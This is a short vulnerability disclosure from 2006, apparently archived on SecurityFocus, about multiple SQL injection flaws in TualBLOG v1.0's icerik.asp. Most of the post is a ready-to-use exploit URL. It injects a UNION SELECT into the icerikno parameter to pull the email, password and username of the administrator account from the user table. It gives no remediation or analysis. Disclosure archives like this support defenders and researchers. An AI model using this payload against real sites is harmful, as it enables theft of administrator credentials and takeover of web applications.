TualBLOG v 1.0 multiple sql injection Sep 13 2006 02:04PM
dj_remix_20 hotmail com
# BiyoSecurity.Org

# script name : TualBLOG v 1.0

# Risk : High

# Regards : Dj ReMix

# Thanks : Korsan , Liz0zim

# Vulnerable file : icerik.asp

exp :

http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,
uyeadi+from+tbl_uye+where+uyeno=1

uyeno = 1 or 2( Admin ID )

Bye :=)

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus